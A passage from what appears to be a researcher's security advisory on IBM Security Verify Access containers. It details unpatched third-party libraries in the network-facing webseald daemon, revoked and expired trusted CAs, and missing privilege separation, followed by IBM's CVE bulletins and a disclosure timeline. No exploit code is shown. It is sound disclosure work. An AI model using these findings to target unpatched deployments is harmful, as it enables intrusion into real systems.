FILE=906082662e6b3a50fc01a95f2d1bb29d3a54349ad76da59fc8555fadadae4e5305463810ece2064174129a95e89352a02d8c72c7397de2d01b38220c3222796992785b8d99401a65b0894778a2b05760ae1a6919a97e259d270ff5e6996a14fc29e48a848c59e14f2aa758e8e26355faeff60eca0562ad643a86b8fdaa6afd10190190d411a584679ff1ee93caf5039ef070d411040fc828e4b8f79b8bb67d3ec1708c8274c0c9f6899399492fa52c73574065f2684dcc336c41eee2b808b42b0a01578b32fae245b761580240e3b53359767634ba76018f46a8d732c21ec24bf1a979aa11af20b646f166d5658efabcebdf6283fbdc793d82636e89bf2ac4ad
#
SELF=10fefb48a0666936f23aceae7805a7dcefb06a9a2282fea0693610a98ccf12cab8bfef973cda13450afde785960eccb2637adaf15f5e795cdb21f667704ba30ebf6a6a077f29a3574d0792ef633172d324a5b26adc257d3380ffd1cf7698bc560fb52d5c083ffa85fe623e059f7c8d67a8043ca75d8808c082de29bb8e1c46a01421039e557699cf7747c07a22a0e1612b0e4de8836833bebc888269dc46adf0ed5ba0107da2e683554433ed29ab840d16af34581682e35a30d11ff10fbd8ba0cc7ae6a62b75c3ba4758863e5a5a4cf00371040358a732a56ecf7dd04523c85544755c6f0f42447f383ec22e0ee4d79bb3c6e6defc4319f555afaaa1cfc8642f
#
#Do not edit before this line
#
# Global Settings
ICC_ALLOW_2KEY3DES=1
The OpenSSL code and the zlib code are at least 2 year old and vulnerable to CVEs.
The Docker images contain known vulnerabilities.
Details - Webseald using outdated code with remotely exploitable vulnerabilities
It was observed that the webseald program borrows codes provided by open-source libraries containing outdated and vulnerable code. This program can be found inside these 2 images:
-
- verify-access
-
- verify-access-wrp
Webseald is reachable over the network.
Libraries used by webseald:
kali-docker# ldd ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/opt/pdweb/bin/webseald
linux-vdso.so.1 (0x00007fffe59f3000)
libwsdaemon.so => not found
libamwoauth.so => not found
libamweb.so => not found
libamwebrte.so => not found
libpdsvcutl.so => not found
libtivsec_msg.so => not found
libpdz.so => not found
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f61885e8000)
libtivsec_xslt4c.so.112 => not found
libtivsec_xml4c.so => not found
libtivsec_yamlcpp.so => not found
libam_gssapi_krb5.so => not found
libmodsecurity.so.3 => not found
libamwredismgr.so => not found
libhiredis.so.0.15 => not found
libhiredis_ssl.so.0.15 => not found
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f61885df000)
libstdc++.so.6 => /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f6188200000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f6188504000)
libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f61884e4000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6187e00000)
/lib64/ld-linux-x86-64.so.2 (0x00007f6188604000)
The IBM-specific libraries (.so) have been analyzed only in surface to detect low-hanging fruits, and several vulnerabilities were found, including some pre-auth vulnerabilities.
Webseal is directly reachable from the network but uses the outdated and vulnerable code.
The quality of the code is extremely inequal between the libraries - some code is very well implemented (with secure calls to -cpy functions) and some code is vulnerable (with insecure calls to -cpy functions). These libraries contain some legacy codes that are not up to date with the current security standards.
Due to the lack of time, only a superficial analysis was done - an attacker with time will likely find 0-day vulnerabilities in these libraries.
Libmodsecurity.so - 1 non-assigned CVE vulnerability
The /opt/pdweb/lib/libmodsecurity.so.3 library (b939c5db3ca94073188ea6eb360049f58f9e9d2a9c7d72bc052d9ee47cc5eccc) contains a vulnerable libinjection library. The version used is 3.9.2:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
This version (3.9.2) is known to have several vulnerabilities. For example, a pre-authentication DoS (https://github.com/SpiderLabs/ModSecurity/issues/1412) from 2017 (no CVE).
This version is confirmed to be vulnerable: https://github.com/client9/libinjection/issues/124.
libtivsec_yamlcpp.so - 4 CVEs
This IBM library is entirely based on yaml-cpp. Yaml-cpp is available at https://github.com/jbeder/yaml-cpp.
Several vulnerabilities have been patched in 2020 (CVE-2017-5950, CVE-2018-20573, CVE-2018-20574 and CVE-2019-6285) in the yaml-cpp library.
This IBM-specific library is located at /usr/lib64/libtivsec_yamlcpp.so and /opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so (cf1b80c501a2f42948322567477c2956155e244d645e3962985569c4496ffad90).
When doing reverse engineering on this file, it appears no security patches have been imported from the official yaml-cpp repository.
We can identify several methods from the yaml-cpp library. For example, the method SingleDocParser::HandleFlowMap() found in /usr/lib64/libtivsec_yamlcpp.so and /opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
When analyzing the security patches available at https://github.com/jbeder/yaml-cpp/pull/807 and https://github.com/jbeder/yaml-cpp/pull/807/files/dbd5ac094622ef3b3951e71c31f59e02c930dc4b, there is no reference in the compiled code regarding a DeepRecursion class or any method implemented in the security patches. This DeepRecursion class is included in the now-patched versions.
The IBM-specific library is using an outdated and vulnerable version of yaml-cpp, without security patches, e.g. 4 CVEs patched in yaml-cpp - https://github.com/jbeder/yaml-cpp/pull/807.
Analysis of the security patches implementing new classes:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Furthermore, it is possible to analyze the rest of the security patches from the git repository and compare them with the assembly code from the libtivsec_yamlcpp.so library. This allows us to conclude the security patches have not been imported into the libtivsec_yamlcpp.so library.
Source code providing security patches:
Method HandleNode() from the security patches and the patched versions of yaml-cpp:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
With the assembly code extracted from the libtivsec_yamlcpp.so library and rebuilt into pseudo-code, we can identify the same logic and the same instructions (minus some errors due to the reconstruction from assembly to C++) - with the lack of the patch located on the line 51.
Pseudo-code of method HandleNode():
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
This allows us to conclude that the libtivsec_yamlcpp.so library is vulnerable to these 4 CVEs.
libtivsec_xml4c.so - outdated Xerces-C library
This library (8b3d3d2dcb1152966d097e91e08fa1dc4300f3653f1c264eeecaf20bb1550832) is located in /usr/lib64/libtivsec_xml4c.so and /opt/ibm/Tivoli/SecUtilities/lib/libtivsec_xml4c.so) and uses outdated code from XML4C 5.5.0 that includes a version of Xerces-C (XML4C doesn't exist anymore and the latest release appears to be from 2007-2008).
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
This version appears to be quite outdated and is likely vulnerable to known CVEs (https://xerces.apache.org/xerces-c/secadv.html).
Details - Outdated and untrusted CAs used in the Docker images
It was observed that the Docker images will trust invalid Certificate Authorities (CA).
Using the Paranoia program, we can list the invalid, expired and revoked CAs that are trusted inside the 4 Docker images.
It appears that these 4 Docker images trust some invalid, revoked or untrusted CAs.
Results for ibmcom/verify-access:10.0.4.0:
kali-docker# paranoia inspect ibmcom/verify-access:10.0.4.0 Certificate CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=VeriSign Trust Network+OU=(c) 2006 VeriSign\, Inc. - For authorized use only,O=VeriSign\, Inc.,C=US removed from Mozilla trust store, no reason given Certificate CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US expires soon ( expires on 2023-03-08T12:00:00Z, 19 weeks 2 days until expiry) Certificate CN=Test CA,O=genua mbh expired ( expired on 2014-10-23T08:22:40Z, 8 years 3 days since expiry) Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry) removed from Mozilla trust store, no reason given Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry) Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: Ownership transferred to GTS: https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281 Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR removed from Mozilla trust store, no reason given Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry) Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59 https://bugzilla.mozilla.org/show_bug.cgi?id=1410277 Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: Ownership transferred to GTS: https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281 Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR removed from Mozilla trust store, no reason given Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59 https://bugzilla.mozilla.org/show_bug.cgi?id=1410277 Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry) removed from Mozilla trust store, no reason given Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry) Certificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry) Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: Ownership transferred to GTS: https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281 Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR removed from Mozilla trust store, no reason given Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry) Certificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry) Found 395 certificates total, of which 21 had issues
Results for:
-
- ibmcom/verify-access-runtime:10.0.4.0
-
- ibmcom/verify-access-wrp:10.0.4.0
-
- ibmcom/verify-access-dsc:10.0.4.0
kali-docker# paranoia inspect ibmcom/verify-access-runtime:10.0.4.0 Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry) removed from Mozilla trust store, no reason given Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry) Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: Ownership transferred to GTS: https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281 Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR removed from Mozilla trust store, no reason given Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry) Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59 https://bugzilla.mozilla.org/show_bug.cgi?id=1410277 Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: Ownership transferred to GTS: https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281 Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR removed from Mozilla trust store, no reason given Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59 https://bugzilla.mozilla.org/show_bug.cgi?id=1410277 Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry) removed from Mozilla trust store, no reason given Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry) Certificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry) Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: Ownership transferred to GTS: https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281 Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR removed from Mozilla trust store, no reason given Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry) Certificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry) Found 374 certificates total, of which 18 had issues
The communications used in the ISVA platform use SSL/TLS with a trust entirely based on underlying CAs. Some CAs have been revoked and cannot be trusted anymore.
The presence of revoked and expired CAs also shows that the security of the Docker images is highly perfectible.
Details - Lack of privilege separation in Docker instances
It was observed that the Docker images do not implement privilege separation. Privilege separation is a software-based implementation of the principle of least privilege.
Using dynamic analysis, the ibmcom/verify-access-wrp:10.0.4.0 Docker image, ibmcom/verify-access:10.0.4.0 Docker image, and the ibmcom/verify-access-runtime Docker image do not correctly implement privilege separation.
Processes running inside the ibmcom/verify-access:10.0.4.0 Docker image:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
isam 1 0.0 0.0 12060 2812 ? Ss Oct21 0:00 /bin/sh /sbin/bootstrap.sh
isam 312 0.0 0.0 24532 56 ? Ss Oct21 0:00 /usr/sbin/mesa_crashd
isam 314 0.1 0.0 24568 2056 ? R Oct21 6:20 /usr/sbin/mesa_crashd
isam 318 0.0 0.0 69160 2732 ? Ss Oct21 0:00 /usr/sbin/mesa_syslogd
isam 322 0.0 0.0 69224 2164 ? S Oct21 0:02 /usr/sbin/mesa_syslogd
isam 399 0.0 0.0 102760 2740 ? Ss Oct21 0:00 /usr/sbin/mesa_eventsd -m 1000
isam 400 0.0 0.1 711216 8276 ? Sl Oct21 0:00 /usr/sbin/mesa_eventsd -m 1000
isam 747 0.0 0.0 270992 7452 ? Ssl Oct21 0:06 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap
isam 756 0.0 0.0 271124 7308 ? Ssl Oct21 0:06 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground
isam 807 0.0 0.0 71488 3084 ? Ss Oct21 0:00 /usr/sbin/iss-lum
isam 808 0.0 0.5 343920 42140 ? Sl Oct21 0:00 /usr/sbin/iss-lum
isam 833 0.0 0.0 128400 5140 ? Ssl Oct21 0:00 /usr/sbin/rsyslogd
isam 873 0.0 0.0 273920 7080 ? Ssl Oct21 0:06 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground
isam 879 1.5 0.5 563872 42292 ? Sl Oct21 71:40 wga_notifications -foreground
isam 892 0.0 0.0 12060 1804 ? S Oct21 0:00 /bin/sh /sbin/bootstrap.sh
isam 895 0.0 0.0 23068 1256 ? S Oct21 0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log
isam 573957 0.0 0.0 47620 3696 pts/0 Rs+ 16:53 0:00 ps -aux
isam 573963 0.0 0.0 11928 2852 ? S 16:53 0:00 sh -c ls /var/support/core_*.* | wc -l
pgresql 434 0.0 0.2 188380 17492 ? Ss Oct21 0:06 /usr/bin/postgres -D /var/postgresql/config/data
pgresql 435 0.0 0.0 138892 2960 ? Ss Oct21 0:00 postgres: logger
pgresql 446 0.0 0.0 188380 2696 ? Ss Oct21 0:00 postgres: checkpointer
pgresql 447 0.0 0.0 188516 4676 ? Ss Oct21 0:03 postgres: background writer
pgresql 448 0.0 0.0 188380 5148 ? Ss Oct21 0:03 postgres: walwriter
pgresql 449 0.0 0.0 189112 5312 ? Ss Oct21 0:04 postgres: autovacuum launcher
pgresql 450 0.0 0.0 139024 3016 ? Ss Oct21 0:15 postgres: stats collector
pgresql 451 0.0 0.0 188916 5492 ? Ss Oct21 0:00 postgres: logical replication launcher
www-data 547 0.3 6.2 4925056 499744 ? SLl Oct21 18:57 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/de
ivmgr 761 0.0 0.5 873712 44896 ? Sl Oct21 0:04 /opt/PolicyDirector/bin/pdmgrd -foreground
ivmgr 863 0.0 0.1 276544 8440 ? Sl Oct21 0:00 /usr/sbin/wga_servertaskd
ldap 752 0.0 10.3 1314228 822572 ? Sl Oct21 0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap
root 813 0.0 0.0 41984 3528 ? Ss Oct21 0:01 /usr/sbin/crond
root 862 0.0 0.0 174348 2828 ? Ss Oct21 0:00 /usr/sbin/wga_servertaskd
Some processes are running as isam. For example, the rsyslogd processys runs as isam. If a program running as isam is compromised inside an instance, then all the programs running as isam are also compromised.
Processes running inside the ibmcom/verify-access-wrp:10.0.4.0 Docker image:
PID USER TIME COMMAND
1 isam 9:42 /opt/pdweb/bin/webseald -foreground -noenv -config etc/webseald-login-internal.conf
32 isam 0:02 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0
The only 2 processes are running as isam.
Processes running inside the ibmcom/verify-access-runtime: 10.0.4.0 Docker image:
PID USER TIME COMMAND
1 isam 1h18 /opt/java/jre/bin/java -javaagent:/opt/ibm/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/rtprofile -Xms512m -Xmx2048m -Dcom.sun.security.enableCRLDP=true -Dsun.net.inetaddr.ttl=30 -Dhttps
38 isam 0:00 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0
63 isam 0:04 /usr/bin/postgres -D /var/postgresql/config/data
64 isam 0:00 postgres: logger
66 isam 0:00 postgres: checkpointer
67 isam 0:00 postgres: background writer
68 isam 0:00 postgres: walwriter
69 isam 0:01 postgres: autovacuum launcher
70 isam 0:05 postgres: stats collector
71 isam 0:00 postgres: logical replication launcher
37169 isam 0:00 bash
37186 isam 0:00 ps -a
In the ibmcom/verify-access-runtime instance, we can confirm the postgres daemon is running. We can also confirm a complete lack of privilege separation: everything is running as isam.
If a program running as isam is compromised inside an instance, then the all the programs running as isam are also compromised.
Vendor Response
IBM provided several security bulletins:
Security Bulletin: IBM Security Verify Access is vulnerable to multiple Security Vulnerabilities - https://www.ibm.com/support/pages/node/7158790:
-
- CVE-2023-38371: IBM Security Access Manager uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.
-
- CVE-2024-35137: IBM Security Access Manager Appliance could allow a local user to possibly elevate their privileges due to sensitive configuration information being exposed.
-
- CVE-2024-35139: IBM Security Verify Access could allow a local user to obtain sensitive information from the container due to incorrect default permissions.
-
- CVE-2023-30998: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls.
-
- CVE-2023-30997: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls.
-
- CVE-2023-38368: IBM Security Access Manager Container could disclose sensitive information to a local user to do improper permission controls.
-
- CVE-2023-38370: IBM Security Access Manager Container, under certain configurations, could allow a user on the network to install malicious packages.
Security Bulletin: Security Vulnerabilities discovered in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7145400:
-
- CVE-2024-25027: IBM Security Verify Access could disclose sensitive snapshot information due to missing encryption.
Security Bulletin: Multiple Security Vulnerabilities were identified in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7106586:
-
- CVE-2023-31003: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain root access due to improper access controls.
-
- CVE-2023-31001: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) temporarily stores sensitive information in files that could be accessed by a local user.
-
- CVE-2023-38267: IBM Security Access Manager Appliance (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain sensitive configuration information.
-
- CVE-2023-31005: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a local user to escalate their privileges due to an improper security configuration.
-
- CVE-2023-30999: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow an attacker to cause a denial of service due to uncontrolled resource consumption.
-
- CVE-2023-43016: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote user to log into the server due to a user account with an empty password.
-
- CVE-2023-32327: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.
-
- CVE-2023-32329: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a user to download files from an incorrect repository due to improper file validation.
-
- CVE-2023-31004: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote attacker to gain access to the underlying system using man in the middle techniques.
-
- CVE-2023-31006: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to a denial of service attacks on the DSC server.
-
- CVE-2023-32328: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure protocols in some instances that could allow an attacker on the network to take control of the server.
-
- CVE-2023-32330: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure calls that could allow an attacker on the network to take control of the server.
-
- CVE-2023-43017: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 could allow a privileged user to install a configuration file that could allow remote access.
-
- CVE-2023-31002: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 temporarily stores sensitive information in files that could be accessed by a local user.
-
- CVE-2023-38369: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 does not require that docker images should have strong passwords by default, which makes it easier for attackers to compromise user accounts.
Security Bulletin: Multiple Security Vulnerabilities were discovered in IBM Security Verify Access Container (CVE-2024-35140, CVE-2024-35141, CVE-2024-35142) - https://www.ibm.com/support/pages/node/7155356:
-
- CVE-2024-35140: IBM Security Verify Access could allow a local user to escalate their privileges due to improper certificate validation.
-
- CVE-2024-35141: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges.
-
- CVE-2024-35142: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges.
Report Timeline
- October 2022: Security assessment performed on IBM Security Verify Access.
- Feb 12, 2023: A complete report was sent to IBM.
- Feb 13, 2023: IBM acknowledged the reception of the security assessment and said that scan tools usually report a lot of issues so I have to check the status of detected CVEs by browsing RedHat webpages and create an issue for each CVE.
- Feb 13, 2023: Replied to IBM saying that the security assessment was not done using a scanner.
- Feb 14, 2023: Asked for an update.
- Feb 14, 2023: IBM confirmed that the report was shared with L3 and "IBM hacking team".
- Feb 22, 2023: IBM said they were still assessing the report.
- Mar 13, 2023: An additional report on ibmsecurity was sent to IBM.
- Mar 13, 2023: IBM confirmed that the second report was shared with L3 team.
- Mar 15, 2023: IBM wanted to organize a meeting about the findings.
- Mar 15, 2023: I replied that I would like to have a written feedback for each reported vulnerability in order to have constructive discussion.
- Apr 4, 2023: I asked again IBM to confirm the vulnerabilities
- Apr 5, 2023: IBM shared the analysis (VulnerabilityResponse.xlsx), confirming several vulnerabilities.
- Apr 11, 2023: I provided my comments (VulnerabilityResponse-comments-Pierre.xlsx) and asked to organize a meeting.
- Apr 11, 2023: IBM confirmed a meeting is possible.
- Apr 18, 2023: I asked to organize a meeting on Apr 19, 2023.
- Apr 18, 2023: IBM confirmed a meeting is possible.
- Apr 19, 2023: I asked to have a meeting where every party (dev team, support and myself) can be present.
- Apr 19, 2023: IBM confirmed a meeting would take place on Apr 20, 2023.
- Apr 20, 2023: Meeting with IBM regarding ISVA. IBM confirmed they would recheck some of the issues and would provide CVEs for the vulnerabilities.
- Apr 23, 2023: I asked to have a second meeting about ibmsecurity.
- Apr 23, 2023: IBM confirmed they will organize a meeting on ibmsecurity.
- Apr 24, 2023: I asked the timeline to get security patches.
- Apr 24, 2023: IBM confirmed there are no ETA to get security patches.
- Apr 27, 2023: Meeting with IBM regarding ibmsecurity. IBM confirmed they will fix all the issues.
- May 10, 2023: I asked for CVE identifiers to track the vulnerabilities.
- May 11, 2023: IBM said that PSIRT records have been opened and the scoring is in progress.
- May 15, 2023: I reached IBM because I found a CVE (CVE-2023-25927) and a security bulletin likely corresponding to a vulnerability I reported, thanks to @CVEnew on Twitter: https://www.ibm.com/support/pages/node/6989653. I asked if this was one of the reported vulnerabilities.
- Jul 7, 2023: IBM said the dev team was still working on the final list of issues and that everything would be fixed in the 10.0.7 release.
- Jul 10, 2023: I asked when the 10.0.7 release would be available. I asked again more details about the previous advisory.
- Jul 11, 2023: IBM said that the 10.0.7 release would be published on Dec 23, 2023. Regarding the CVEs, IBM replied they would need to discuss with the dev team.
- Jul 12, 2023: I asked IBM to confirm if CVE-2023-25927 was one of the reported vulnerabilities.
- Jul 12, 2023: IBM said that they do not credit security researchers.
- Jul 13, 2023: I provided several IBM security bulletins where security researchers were credited, e.g. https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430.
- Jul 14, 2023: IBM confirmed that they would forward the information to L3 team and asked what I would want to do with this case.
